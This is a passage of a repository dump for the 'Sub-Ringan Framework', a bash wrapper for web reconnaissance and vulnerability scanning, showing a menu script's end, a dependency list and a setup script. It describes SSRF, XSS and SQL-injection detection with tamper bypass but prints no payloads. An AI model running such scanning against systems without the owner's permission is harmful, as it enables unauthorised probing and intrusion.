496 | ⠀⠈⡆⣿⣿⣿⣿⣿⣿⣿⣿⣇⠀⠀⠀⠀⠀⠀⠀⢱⠀⠀⡇⡇⠀⢰⠃⠀⢀⢀⣀⣀⣀⣀⢸⣼⣿⣿⣿⣿⣿⣿⣿⣷⣧⡀⠽⣃⣀⠀⠀⠀⠀⠀
497 | ⢀⣾⣿⣿⣿⣿⣿⠟⠻⠧⣉⠛⢅⠈⠙⠋⠉⠙⠛⠛⡆⠀⠁⠁⠀⡾⠋⢹⡿⠁⠀⣿⠀⠀⡉⣿⣿⣿⣿⣿⣿⣿⣿⡏⡏⡇⠀⠀⠀⠀⠀⠀⠀⠀
498 | ⢸⣿⣿⣿⣿⣿⣿⡙⠓⠂⢌⢦⠘⣄⣀⡀⠀⠀⠀⠀⡇⠀⣸⠁⠀⡇⠀⢸⡇⠀⢸⣿⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣇⠿⠁⠀⠀⠀⠀⠀⠀"
499 | echo "\e[0m\033[1;31m-------------------------------------------------\033[1;33m "
500 | echo ""
501 | echo "[!] \e[5;91mInvalid choice. Exiting...\e[0m"
502 | exit 1
503 | ;;
504 | esac
505 | 


--------------------------------------------------------------------------------
/Sub-ringan/km_20230806-1_1440p_30f_20230806_215451.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DevVj-1/Sub-Ringan-Framework/d5d3d1303c3a661165f1c45315bf2e2cc549c66e/Sub-ringan/km_20230806-1_1440p_30f_20230806_215451.mp4


--------------------------------------------------------------------------------
/Sub-ringan/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DevVj-1/Sub-Ringan-Framework/d5d3d1303c3a661165f1c45315bf2e2cc549c66e/Sub-ringan/logo.png


--------------------------------------------------------------------------------
/Sub-ringan/requirements.txt:
--------------------------------------------------------------------------------
 1 | # Installation and Prerequisites for Sub-Ringan ⚜️ Framework:
 2 | 
 3 | > Required 🛐 Dependencies:
 4 | 
 5 | gf: A powerful pattern-matching utility for extracting URLs and other useful information from web pages. 
 6 | Install it from: https://github.com/tomnomnom/gf
 7 | 
 8 | httpx: A fast and multi-purpose HTTP utility. 
 9 | Install it from: https://github.com/projectdiscovery/httpx
10 | 
11 | tee: A command-line utility for redirecting output to multiple files. It's usually available by default on most Unix-like systems!
12 | 
13 | 
14 | assetfinder: A tool to discover assets from a domain.
15 | Install it from: https://github.com/tomnomnom/assetfinder
16 | 
17 | getallurls: A tool to fetch all URLs from a web page.
18 | Install it from: https://github.com/lc/gau
19 | 
20 | waybackurls: A tool to fetch URLs from the Wayback Machine. 
21 | Install it from: https://github.com/tomnomnom/waybackurls
22 | 
23 | gxss: A tool for finding XSS vulnerabilities. 
24 | Install it from: https://github.com/KathanP19/Gxss
25 | 
26 | anew: A tool for filtering and manipulating text output.
27 | Install it from: https://github.com/tomnomnom/anew
28 | 
29 | # Installation ✅ Steps:
30 | 
31 | 1. Clone the Sub-Ringan Framework repository from GitHub:
32 | 
33 | '''
34 | git clone https://github.com/DevVj-1/Sub-Ringan-Framework.git
35 | 
36 | '''
37 | 2. Navigate to the Sub-Ringan Framework directory:
38 | 
39 | ,,,
40 | cd  Sub-Ringan Framework 
41 | chmod +x Sub-Ringan.sh
42 | ./ Sub-Ringan.sh
43 | or 
44 | sh Sub-Ringan.sh
45 | ,,,
46 | 
47 | > 3. Make sure all the required dependencies are installed and available in your system
48 | 
49 | 
50 | raised_hands Special Thanks to the Awesome Tools that Power Sub-Ringan Framework! raised_hands
51 | 
52 | gf: Rohan Aggarwal (@rohank1337)
53 | httpx: Tom Hudson (@tomnomnom)
54 | getallurls: Tom Hudson (@tomnomnom)
55 | waybackurls: Tom Hudson (@tomnomnom)
56 | gxss: Tom Hudson (@tomnomnom)
57 | anew: Tom Hudson (@tomnomnom)
58 | sqlmap: Bernardo Damele A. G. (@MiroslavStampar)
59 | asset finder: Tom Hudson (@tomnomnom)
60 | amass: Jeff Foley (@caffix)
61 | subfinder: Ice3man (@Ice3man543)
62 | tee: It's a basic Unix command. No specific author.
63 | qsreplace: Tom Hudson (@tomnomnom)
64 | ffuf: Magnus Stubman (@ffuf)
65 | Kudos to these talented individuals for their invaluable contributions! 🌟
66 | 
67 | Sub-Ringan-Framework: is not just relying on other tools – it brings some fresh techniques to the table, like header-based SSRF detection 🔍 and an inbuilt polyglot XSS payload. and detect time based⏳ SQL injection with temper bypass technique It's not just a wrapper for other programs.
68 | 


--------------------------------------------------------------------------------
/Sub-ringan/setup.sh:
--------------------------------------------------------------------------------
  1 | # ! /bin/bash
  2 | 
  3 | 
  4 | 
  5 | echo "Wellcome to Sub-Ringan Setup!"
  6 | echo ""
  7 | 
  8 | for arg in "$@"
  9 | do
 10 |     case $arg in
 11 |         -h|--help)
 12 |         echo "Sub-Ringan-Framework 🛐 Dependency Installer"
 13 |         echo " "
 14 |         echo "$0 [options]"
 15 |         echo " "
 16 |         echo "options:"
 17 |         echo "-h, --help                show brief help"
 18 |         echo "-t, --toolsdir            tools directory, defaults to '/opt'"
 19 |         echo ""
 20 |         echo "Note: If you choose a non-default tools directory, please adapt the default in the setup.sh file or pass the -t flag to ensure it finds the right tools."
 21 |         echo ""
 22 |         echo "example:"
 23 |         echo "$0 -t /opt"
 24 |         exit 0
 25 |         ;;
 26 |         -t|--toolsdir)
 27 |         toolsDir="$2"
 28 |         shift
 29 |         shift
 30 |         ;;
 31 |     esac
 32 | done
 33 | 
 34 | echo "\33[1;32mInstalling Dependencies..."
 35 | 
 36 | # Golang
 37 | go version &> /dev/null
 38 | if [ $? -ne 0 ]; then
 39 |     echo "[*] Installing Golang..."
 40 |     wget -q https://golang.org/dl/go1.20.4.linux-amd64.tar.gz
 41 |     tar -xvf go1.20.4.linux-amd64.tar.gz -C /usr/local >/dev/null
 42 |     rm -rf ./go1.20.4.linux-amd64.tar.gz >/dev/null
 43 |     export GOROOT="/usr/local/go"
 44 |     export GOPATH="$homeDir/go"
 45 |     export PATH="$PATH:${GOPATH}/bin:${GOROOT}/bin:${PATH}"
 46 | else
 47 |     echo "[*] Skipping Golang install, already installed."
 48 |     echo "[!] Note: This may cause errors. If it does, check your Golang version and settings."
 49 | fi
 50 | 
 51 | 
 52 | # Go packages
 53 | echo "\33[1;34m[*] Installing various Go packages..."
 54 | export GO111MODULE="on"
 55 | go install github.com/tomnomnom/waybackurls@latest
 56 | go install github.com/tomnomnom/gf@latest &>/dev/null
 57 | go install github.com/tomnomnom/qsreplace@latest &>/dev/null
 58 | 
 59 | # HTTPX
 60 | echo "\33[1;35m[*] Installing HTTPX..."
 61 | wget -q https://github.com/projectdiscovery/httpx/releases/download/v1.3.1/httpx_1.3.1_linux_amd64.zip
 62 | unzip -j httpx_1.3.1_linux_amd64.zip -d /usr/bin/ httpx >/dev/null
 63 | rm httpx_1.3.1_linux_amd64.zip
 64 | 
 65 | # Amass
 66 | echo "\33[1;36m[*] Installing Amass..."
 67 | wget -q https://github.com/owasp-amass/amass/releases/download/v3.23.2/amass_Linux_amd64.zip
 68 | unzip -q amass_Linux_amd64.zip
 69 | mv amass_Linux_amd64 amass
 70 | rm amass_Linux_amd64.zip
 71 | cp $toolsDir/amass/amass /usr/bin/amass
 72 | 
 73 | # Gf-patterns
 74 | echo "\33[1;33m[*] Installing Gf-patterns..."
 75 | git clone -q https://github.com/1ndianl33t/Gf-Patterns
 76 | mkdir "$homeDir"/.gf
 77 | cp "$toolsDir"/Gf-Patterns/*.json "$homeDir"/.gf
 78 | 
 79 | 
 80 | # Persist configured environment variables via global profile.d script
 81 | echo "\33[1;35m[*] Setting environment variables..."
 82 | if [ -f "$homeDir"/.bashrc ]
 83 | then
 84 |     { echo "export GOROOT=/usr/local/go";
 85 |     echo "export GOPATH=$homeDir/go";
 86 |     echo 'export PATH=$PATH:$GOPATH/bin:$GOROOT/bin';
 87 |     echo "export GO111MODULE=on"; } >> "$homeDir"/.bashrc
 88 | fi
 89 | 
 90 | if [ -f "$homeDir"/.zshrc ]
 91 | then
 92 |     { echo "export GOROOT=/usr/local/go";
 93 |     echo "export GOPATH=$homeDir/go";
 94 |     echo 'export PATH=$PATH:$GOPATH/bin:$GOROOT/bin';
 95 |     echo "export GO111MODULE=on"; } >> "$homeDir"/.zshrc
 96 | fi
 97 | 
 98 | echo "\33[1;32m[*] SETUP FINISHED."
 99 | exit 0
100 | #
101 | 


--------------------------------------------------------------------------------
/Verified-project-GPCSSI.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DevVj-1/Sub-Ringan-Framework/d5d3d1303c3a661165f1c45315bf2e2cc549c66e/Verified-project-GPCSSI.pdf


--------------------------------------------------------------------------------